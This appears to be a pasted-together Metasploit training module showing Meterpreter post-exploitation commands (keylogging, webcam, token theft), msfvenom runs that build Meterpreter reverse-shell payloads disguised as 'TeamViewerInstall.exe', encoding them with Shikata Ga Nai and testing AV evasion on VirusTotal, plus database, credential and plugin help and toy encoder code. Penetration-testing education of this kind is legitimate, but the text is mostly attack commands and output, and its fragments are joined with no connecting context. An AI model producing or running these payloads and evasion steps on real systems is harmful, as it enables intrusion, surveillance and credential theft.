    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of hostnames on the target
    route         View and modify the routing table
Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idle_time      Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user's desktop in real-time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components
Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-07-21 06:56:23 +0000  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 05:08:56 +0000  All Users
40555/r-xr-xr-x   8192  dir   2009-07-14 03:20:08 +0000  Default
40777/rwxrwxrwx   0     dir   2009-07-14 05:08:56 +0000  Default User
40555/r-xr-xr-x   4096  dir   2009-07-14 03:20:08 +0000  Public
100666/rw-rw-rw-  174   fil   2009-07-14 04:54:24 +0000  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-07-14 13:45:33 +0000  haris
meterpreter > shell
Process 2664 created. Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
Encoders are also needed to remove bad characters from a payload: hex opcodes the target will not accept, such as the null byte that terminates a string copy, which is why the msfvenom run below passes -b "\x00". Encoding a payload into a different form has also been used to help with antivirus evasion, as mentioned above. However, as IPS/IDS and AV vendors improved how their products handle malware and virus signatures, using encoders purely for AV evasion has become less effective over time.

Shikata Ga Nai (SGN) is still one of the most used encoding schemes today, because payloads passed through it were once hard to detect. They are no longer universally undetectable; far from it. The name (仕方がない) means "It cannot be helped" or "Nothing can be done about it", which was fitting a few years ago. We will look at other ways to evade protection systems later. An article from FireEye details why and how Shikata Ga Nai came to dominate the other encoders.
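The mechanics the two paragraphs above describe, as an added example that is not Metasploit's encoder: a toy XOR additive-feedback encoder in the style of x86/shikata_ga_nai, written in Python to show why the encoded bytes differ on every run (random key), how a bad-character list such as -b "\x00" is satisfied by retrying keys until none of the forbidden bytes appear, and why -i N grows the output with every iteration. The key-update arithmetic and the 4-byte key header (which stands in for the x86 decoder stub that carries the key in real SGN) are this model's assumptions, and the "shellcode" is a constructed byte string.

```python
"""
Toy XOR additive-feedback encoder in the style of x86/shikata_ga_nai.
Added example, not Metasploit's encoder: real SGN emits a polymorphic
x86 decoder stub (GetPC trick, random register choice) whose exact
arithmetic differs. This model only shows the encode/decode loop, the
bad-character retry and the effect of stacking iterations.
"""
import random
import struct


def _pad(buf: bytes) -> bytes:
    """Pad to whole dwords with x86 NOPs so every block is 4 bytes."""
    return buf + b"\x90" * (-len(buf) % 4)


def encode_once(plain: bytes, key: int) -> bytes:
    """XOR each dword with the running key; the key then absorbs the decoded
    dword, so each block's key depends on all earlier plaintext (feedback)."""
    out = bytearray()
    for off in range(0, len(plain), 4):
        (dword,) = struct.unpack("<I", plain[off:off + 4])
        out += struct.pack("<I", dword ^ key)
        key = (key + dword) & 0xFFFFFFFF
    return bytes(out)


def decode_once(blob: bytes, key: int) -> bytes:
    """Mirror of encode_once: what the decoder stub does on the target."""
    out = bytearray()
    for off in range(0, len(blob), 4):
        (enc,) = struct.unpack("<I", blob[off:off + 4])
        dword = enc ^ key
        out += struct.pack("<I", dword)
        key = (key + dword) & 0xFFFFFFFF
    return bytes(out)


def has_badchars(blob: bytes, badchars: bytes) -> bool:
    return any(b in badchars for b in blob)


def encode(payload: bytes, badchars: bytes = b"", iterations: int = 1,
           seed=None, max_tries: int = 10000) -> bytes:
    """Layered encoding with bad-character avoidance (msfvenom -b / -i).
    The 4-byte key is prepended to stand in for the decoder stub that carries
    it, so the key bytes face the bad-character check too, as in SGN where the
    key sits inside a mov instruction. `seed` makes a run reproducible."""
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    buf = _pad(payload)
    for _ in range(iterations):
        for _ in range(max_tries):
            key = rng.getrandbits(32)
            candidate = struct.pack("<I", key) + encode_once(buf, key)
            if not has_badchars(candidate, badchars):
                buf = candidate
                break
        else:
            raise ValueError("no key avoids the bad characters; try another encoder")
    return buf


def decode(blob: bytes, iterations: int = 1) -> bytes:
    """Peel the layers off in reverse; the NOP padding stays at the end."""
    for _ in range(iterations):
        (key,) = struct.unpack("<I", blob[:4])
        blob = decode_once(blob[4:], key)
    return blob


if __name__ == "__main__":
    # Constructed stand-in for shellcode: every byte value, so 0x00 is present.
    shellcode = bytes(range(256))
    bad = b"\x00\x0a\x0d"
    enc = encode(shellcode, badchars=bad, iterations=3)
    assert not has_badchars(enc, bad)
    assert decode(enc, iterations=3)[:len(shellcode)] == shellcode
    print(f"{len(shellcode)} -> {len(enc)} bytes, no bad chars, round-trips")
```

Two things carry over to the real tool. First, when the bad-character list is long relative to the payload, the retry loop can fail, which is when msfvenom falls back to another encoder from the "compatible encoders" list. Second, what a signature or emulator keys on is the part that does not change: the randomised body is different on every run, but the decoder logic in front of it is not, so stacking iterations only stacks decoder stubs in front of the same payload. That is why the ten-iteration run further down is still detected.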
vnswer77@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of perl file: 1674 bytes
my $buf =
"\xda\xc1\xba\x37\xc7\xcb\x5e\xd9\x74\x24\xf4\x5b\x2b\xc9" .
"\xb1\x59\x83\xeb\xfc\x31\x53\x15\x03\x53\x15\xd5\x32\x37" .
"\xb6\x96\xbd\xc8\x47\xc8\x8c\x1a\x23\x83\xbd\xaa\x27\xc1" .
"\x4d\x42\xd2\x6e\x1f\x40\x2c\x8f\x2b\x1a\x66\x60\x9b\x91" .
"\x50\x4f\x23\x89\xa1\xce\xdf\xd0\xf5\x30\xe1\x1a\x08\x31" .
vnswer77@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
Saved as: TeamViewerInstall.exe
This generates a payload in exe format named TeamViewerInstall.exe for the x86 architecture on the Windows platform, carrying a Meterpreter reverse_tcp payload encoded once with Shikata Ga Nai. Let's upload the result to VirusTotal.

A better option would be to run it through several iterations of the same encoding scheme:

Shikata Ga Nai encoding
vnswer77@htb[/htb]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai succeeded with size 503 (iteration=5)
x86/shikata_ga_nai succeeded with size 530 (iteration=6)
x86/shikata_ga_nai succeeded with size 557 (iteration=7)
x86/shikata_ga_nai succeeded with size 584 (iteration=8)
x86/shikata_ga_nai succeeded with size 611 (iteration=9)
x86/shikata_ga_nai chosen with final size 611
Payload size: 611 bytes
Final size of exe file: 73802 bytes
Error: Permission denied @ rb_sysopen - /root/Desktop/TeamViewerInstall.exe
As we can see, this is still not enough for AV evasion: plenty of products still detect the payload. Alternatively, Metasploit ships a tool, msf-virustotal, which we can use together with an API key to analyze our payloads. This requires free registration on VirusTotal.
[*] Using API key: <API key>
[*] Please wait while I upload TeamViewerInstall.exe...
[*] VirusTotal: Scan request successfully queued, come back later for the report
[*] Sample MD5 hash : 4f54cc46e2f55be168cc6114b74a3130
[*] Sample SHA1 hash : 53fcb4ed92cf40247782de41877b178ef2a9c5a9
[*] Sample SHA256 hash : 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8
[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1651750343
[*] Requesting the report...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Analysis Report: TeamViewerInstall.exe (51 / 68): 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8
==================================================================================================================
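The size column in the msfvenom output above grows by a fixed 27 bytes per iteration, and the VirusTotal score barely moves. The following is an added Ruby model of the XOR additive-feedback scheme that x86/shikata_ga_nai is built on; it is not Metasploit's encoder, and the STUB constant, the sample payload and the key are constructed stand-ins (the real decoder is polymorphic x86 code that this model does not generate). It shows the two properties the output illustrates: each extra iteration wraps the previous blob and prepends one more decoder, so size grows by a constant, and the outermost decoder is always in the clear, so a detection that keys on the decoder fires at any iteration count.

```ruby
# Added example, not Metasploit code: a minimal model of XOR plus additive
# feedback (the scheme behind x86/shikata_ga_nai). Assumptions: 4-byte
# little-endian key; STUB is a placeholder for the real polymorphic x86
# decoder; SAMPLE_PAYLOAD is a constructed 8-byte stand-in for shellcode.
STUB = "\xd9\x74\x24\xf4\x5b\x31\xc9\xb1".b          # placeholder "decoder" bytes
SAMPLE_PAYLOAD = "\x31\xc0\x50\x68\x2f\x2f\x73\x68".b  # constructed, not real shellcode

# Encode (or decode) a buffer: each dword is XORed with the running key and the
# plaintext dword is then added into the key, mirroring a decoder loop of the
# form  xor [esi+off], eax ; add eax, [esi+off]
def xor_feedback(data, key, decode: false)
  bytes = data.b.bytes
  bytes.concat([0] * ((4 - bytes.size % 4) % 4))   # pad to a dword boundary
  out = []
  bytes.each_slice(4) do |dw|
    k = [key].pack('V').bytes
    res = dw.zip(k).map { |d, kb| d ^ kb }
    plain = decode ? res : dw                       # both sides feed back the plaintext
    out.concat(res)
    key = (key + plain.pack('C*').unpack1('V')) & 0xFFFFFFFF
  end
  out.pack('C*')
end

# Emulates -i N: every iteration encodes the previous blob (its stub included)
# and prepends a fresh stub, so the outermost stub is never encoded.
def encode_iterations(payload, key, iterations)
  buf = payload.b
  iterations.times { |i| buf = STUB + xor_feedback(buf, key + i) }
  buf
end

# Peels the layers in reverse order; raises if a layer lacks its stub.
def decode_iterations(blob, key, iterations)
  buf = blob.b
  (iterations - 1).downto(0) do |i|
    raise 'decoder stub missing' unless buf.start_with?(STUB)
    buf = xor_feedback(buf[STUB.bytesize..], key + i, decode: true)
  end
  buf
end

# Output size after 1..n iterations: growth per iteration equals STUB.bytesize,
# the same constant-step pattern as the msfvenom output (27 bytes there).
def layer_sizes(payload, key, n)
  (1..n).map { |i| encode_iterations(payload, key, i).bytesize }
end

# A naive static signature on the stub: true at every iteration count, because
# the outermost decoder is always plaintext.
def stub_signature_hit?(blob)
  blob.b.include?(STUB)
end
```

Real Shikata Ga Nai decoders are generated with randomised registers and an FPU-based position-independent prologue, so a byte signature like the one above does not work against them; what does is emulating the decoder, which is exactly why the detection count in the VirusTotal report is insensitive to the iteration count.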
Command           Description
-------           -----------
db_connect        Connect to an existing database
db_disconnect     Disconnect from the current database instance
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache
db_status         Show the current database status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
Usage:
    workspace                  List workspaces
    workspace -v               List workspaces verbosely
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -D               Delete all workspaces
    workspace -r               Rename workspace
    workspace -h               Show this help information
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 20:54 UTC
Nmap scan report for 10.10.10.40
Host is up (0.017s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.81 seconds

[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.9'
[*] Importing host 10.10.10.40
[*] Successfully imported ~/Target.xml
msf6 > hosts
Hosts =====
address      mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------  ---------  -----  -------  ----  --------
10.10.10.40             Unknown                    device
msf6 > services
Services ========
host         port   proto  name          state  info
----         ----   -----  ----          -----  ----
10.10.10.40  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.40  445    tcp    microsoft-ds  open   Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.10.40  49152  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49153  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49154  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49155  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49156  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49157  tcp    msrpc         open   Microsoft Windows RPC

[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 21:04 UTC
[*] Nmap: Nmap scan report for 10.10.10.8
[*] Nmap: Host is up (0.016s latency).
[*] Nmap: Not shown: 999 filtered ports
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 80/tcp open  http    HttpFileServer httpd 2.3
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
msf6 > hosts
Hosts =====
address      mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------  ---------  -----  -------  ----  --------
10.10.10.8              Unknown                    device
10.10.10.40             Unknown                    device
msf6 > services
Services ========
host         port   proto  name          state  info
----         ----   -----  ----          -----  ----
10.10.10.8   80     tcp    http          open   HttpFileServer httpd 2.3
10.10.10.40  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.10.40  445    tcp    microsoft-ds  open   Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.10.40  49152  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49153  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49154  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49155  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49156  tcp    msrpc         open   Microsoft Windows RPC
10.10.10.40  49157  tcp    msrpc         open   Microsoft Windows RPC
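Both `db_import ~/Target.xml` and `db_nmap` end up in the same place: the scanner's XML is parsed into the `hosts` and `services` tables shown above, which later feed options such as `services -p 445 -R` (set RHOSTS from the search). The following added Ruby example shows that pipeline in miniature. It is not Metasploit's importer (which uses Nokogiri); it uses the REXML parser from Ruby's standard library, and the XML document is constructed to resemble the 10.10.10.40 scan, with an extra closed port and a down host added so the filtering is visible.

```ruby
require 'rexml/document'

# Constructed Nmap XML (the shape `nmap -oX` writes), modeled on the scan of
# 10.10.10.40 above; not real scanner output.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" version="7.80">
    <host>
      <status state="up"/>
      <address addr="10.10.10.40" addrtype="ipv4"/>
      <hostnames><hostname name="HARIS-PC" type="user"/></hostnames>
      <ports>
        <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
        <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds" extrainfo="workgroup: WORKGROUP"/></port>
        <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
      </ports>
    </host>
    <host>
      <status state="down"/>
      <address addr="10.10.10.41" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

# Parse the report into rows shaped like msfconsole's `hosts` and `services`
# tables. A host without a <ports> element contributes no service rows.
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  hosts = []
  services = []
  doc.elements.each('nmaprun/host') do |h|
    ipv4 = h.elements.to_a('address').find { |a| a.attributes['addrtype'] == 'ipv4' }
    addr = ipv4.attributes['addr']
    hn = h.elements['hostnames/hostname']
    hosts << { address: addr,
               name: hn && hn.attributes['name'],
               state: h.elements['status'].attributes['state'] }
    h.elements.each('ports/port') do |p|
      svc = p.elements['service']
      info = svc ? [svc.attributes['product'], svc.attributes['extrainfo']].compact.join(' ') : ''
      services << { host: addr,
                    port: p.attributes['portid'].to_i,
                    proto: p.attributes['protocol'],
                    name: svc && svc.attributes['name'],
                    state: p.elements['state'].attributes['state'],
                    info: info }
    end
  end
  { hosts: hosts, services: services }
end

# Equivalent of `services -u` (optionally `-p <port>`): open services only.
def open_services(db, port: nil)
  db[:services].select { |s| s[:state] == 'open' && (port.nil? || s[:port] == port) }
end

# Equivalent of `services -p <port> -R`: the RHOSTS string built from the hosts
# that have that port open (empty when nothing matches, so nothing gets set).
def rhosts_for(db, port:)
  open_services(db, port: port).map { |s| s[:host] }.uniq.join(' ')
end
```

The point of keeping the closed port and the down host in the sample is the `-R` behaviour: a port that is only reported closed must not end up in RHOSTS, otherwise the next `run` sprays the exploit at hosts the scan already ruled out.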
OPTIONS:
  -a,--add          Add the hosts instead of searching
  -d,--delete       Delete the hosts instead of searching
  -c <col1,col2>    Only show the given columns (see list below)
  -C <col1,col2>    Only show the given columns until the next restart (see list below)
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in CSV format
  -O <column>       Order rows by specified column number
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -i,--info         Change the info of a host
  -n,--name         Change the name of a host
  -m,--comment      Change the comment of a host
  -t,--tag          Add or specify a tag to a range of hosts

  -a,--add          Add the services instead of searching
  -d,--delete       Delete the services instead of searching
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -s <name>         Name of the service to add
  -p <port>         Search for a list of ports
  -r <protocol>     Protocol type of the service being added [tcp|udp]
  -u,--up           Only show services which are up
  -o <file>         Send output to a file in csv format
  -O <column>       Order rows by specified column number
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -U,--update       Update data for existing service
Available columns: created_at, info, name, port, proto, state, updated_at
Usage - Adding credentials:
  creds add uses the following named parameters.
    user      :  Public, usually a username
    password  :  Private, private_type Password.
    ntlm      :  Private, private_type NTLM Hash.
    postgres  :  Private, private_type Postgres MD5
    ssh-key   :  Private, private_type SSH key, must be a file path.
    hash      :  Private, private_type Nonreplayable hash
    jtr       :  Private, private_type John the Ripper hash type.
    realm     :  Realm, realm-type: Realm, realm_type (domain db2db sid pgdb rsync wildcard), defaults to domain.

Examples: Adding
   # Add a user, password and realm
   creds add user:admin password:notpassword realm:workgroup
   # Add a user and password
   creds add user:guest password:'guest password'
   # Add a password
   creds add password:'password without username'
   # Add a user with an NTLMHash
   creds add user:admin ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A
   # Add a NTLMHash
   creds add ntlm:E2FC15074BF7751DD408E6B105741864:A1074A69B1BDE45403AB680504BBDD1A
   # Add a Postgres MD5
   creds add user:postgres postgres:md5be86a79bf2043622d58d5453c47d4860
   # Add a user with an SSH key
   creds add user:sshadmin ssh-key:/path/to/id_rsa
   # Add a user and a NonReplayableHash
   creds add user:other hash:d19c32489b870735b5f587d76b934283 jtr:md5
   # Add a NonReplayableHash
   creds add hash:d19c32489b870735b5f587d76b934283

General options
  -h,--help             Show this help information
  -o <file>             Send output to a file in csv/jtr (john the ripper) format. If the file name ends in '.jtr', that format will be used. If file name ends in '.hcat', the hashcat format will be used. CSV by default.
  -d,--delete           Delete one or more credentials

Filter options for listing
  -P,--password <text>  List passwords that match this text
  -p,--port <portspec>  List creds with logins on services matching this port spec
  -s <svc names>        List creds matching comma-separated service names
  -u,--user <text>      List users that match this text
  -t,--type <type>      List creds that match the following types: password,ntlm,hash
  -O,--origins <IP>     List creds that match these origins
  -R,--rhosts           Set RHOSTS from the results of the search
  -v,--verbose          Don't truncate long password hashes

Examples, listing:
  creds               # Default, returns all credentials
  creds 1.2.3.4/24    # Return credentials with logins in this range
  creds -O 1.2.3.4/24 # Return credentials with origins in this range
  creds -p 22-25,445  # nmap port specification
  creds -s ssh,smb    # All creds associated with a login on SSH or SMB services
  creds -t NTLM       # All NTLM creds
  creds -j md5        # All John the Ripper hash type MD5 creds

Example, deleting:
  # Delete all SMB credentials
  creds -d -s smb

  -a,--add          Add loot to the list of addresses, instead of listing
  -d,--delete       Delete *all* loot matching host and type
  -f,--file         File with contents of the loot to add
  -i,--info         Info of the loot to add
  -t <type1,type2>  Search for a list of types
  -h,--help         Show this help information
  -S,--search       Search string to filter by
Plugins make a penetration tester's life easier by bringing the functionality of well-known software into the msfconsole and Metasploit Pro environment. Previously, we had to cycle between different tools, importing and exporting results and setting the same options and parameters over and over; with plugins, msfconsole records everything automatically into the database we are working with, and hosts, services and vulnerabilities are available to the user at a glance. Plugins work directly with the API and can manipulate the entire framework. They can be used to automate repetitive tasks, add new commands to msfconsole, and extend the already powerful framework.
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded Plugin: Nessus
msf6 > nessus_help
Command                   Help Text
-------                   ---------
Generic Commands          -----------------
-----------------
nessus_connect            Connect to a Nessus server
nessus_logout             Logout from the Nessus server
nessus_login              Login into the connected Nessus server with a different username and

<SNIP>

nessus_user_del           Delete a Nessus User
nessus_user_passwd        Change Nessus Users Password
Policy Commands           -----------------
-----------------
nessus_policy_list        List all polciies
nessus_policy_del         Delete a policy
If a plugin is not installed correctly, we get the following error when trying to load it.
MSF - Loading Nessus
msf6 > load Plugin_That_Does_Not_Exist
[-] Failed to load plugin from /usr/share/metasploit-framework/plugins/Plugin_That_Does_Not_Exist.rb: cannot load such file -- /usr/share/metasploit-framework/plugins/Plugin_That_Does_Not_Exist.rb
Command                  Description
-------                  -----------
check_footprint          Checks the possible footprint of a post module on a target system.

auto_exploit Commands
=====================

Command                  Description
-------                  -----------
show_client_side         Show matched client side exploits from data imported from vuln scanners.
vuln_exploit             Runs exploits based on data imported from vuln scanners.

Discovery Commands
==================

Command                  Description
-------                  -----------
discover_db              Run discovery modules against current hosts in the database.
network_discover         Performs a port-scan and enumeration of services found for non pivot networks.
pivot_network_discover   Performs enumeration of networks available to a specified Meterpreter session.
show_session_networks    Enumerate the networks one could pivot thru Meterpreter in the active sessions.

Project Commands
================

Command                  Description
-------                  -----------
project                  Command for managing projects.

Postauto Commands
=================

Command                  Description
-------                  -----------
app_creds                Run application password collection modules against specified sessions.
get_lhost                List local IP addresses that can be used for LHOST.
multi_cmd                Run shell command against several sessions
multi_meter_cmd          Run a Meterpreter Console Command against specified sessions.
multi_meter_cmd_rc       Run resource file with Meterpreter Console Commands against specified sessions.
multi_post               Run a post module against specified sessions.
multi_post_rc            Run resource file with post modules and options against specified sessions.
sys_creds                Run system password collection modules against specified sessions.
Id  Name  Type                     Information                      Connection
--  ----  ----                     -----------                      ----------
1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MS01       10.10.10.129:443 -> 10.10.10.205:50501 (10.10.10.205)
msf6 exploit(multi/handler) > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

    -K        Terminate all running jobs.
    -P        Persist all running jobs on restart.
    -S <opt>  Row search filter.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate jobs by job ID and/or range.
    -l        List all running jobs.
    -p <opt>  Add persistence to job by job ID
    -v        Print more detailed info.  Use with -i and -l

    -J        Force running in the foreground, even if passive.
    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.
<SNIP>
Running the exploit as a background job
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.34:4444
Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
pivot                     Manage pivot listeners
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
secure                    (Re)Negotiate TLV packet encryption on the session
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                     Writes data to a channel
Name          Current Setting        Required  Description
----          ---------------        --------  -----------
HttpPassword                         no        The HTTP password to specify for authentication
HttpUsername                         no        The HTTP username to specify for authentication
METHOD        move                   yes       Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
PATH          /metasploit%RAND%.asp  yes       The path to attempt to upload
Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT         80                     yes       The target port (TCP)
SSL           false                  no        Negotiate SSL/TLS for outgoing connections
VHOST                                no        HTTP server virtual host

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.10.239.181    yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

 PID   PPID  Name          Arch  Session  User                          Path
 ---   ----  ----          ----  -------  ----                          ----
 1712  396   alg.exe
 1836  592   wmiprvse.exe  x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1920  396   dllhost.exe
 2232  3552  svchost.exe   x86   0                                      C:\WINDOWS\Temp\rad9E519.tmp\svchost.exe
 2312  592   wmiprvse.exe
 3552  1460  w3wp.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3624  592   davcdata.exe  x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 4076  1080  cidaemon.exe
meterpreter > steal_token 1836
Stolen token with username: NT AUTHORITY\NETWORK SERVICE
#  Name                                      Disclosure Date  Rank    Check  Description
-  ----                                      ---------------  ----    -----  -----------
0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

msf6 exploit(windows/iis/iis_webdav_upload_asp) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options

Name             Current Setting  Required  Description
----             ---------------  --------  -----------
SESSION                           yes       The session to run this module on
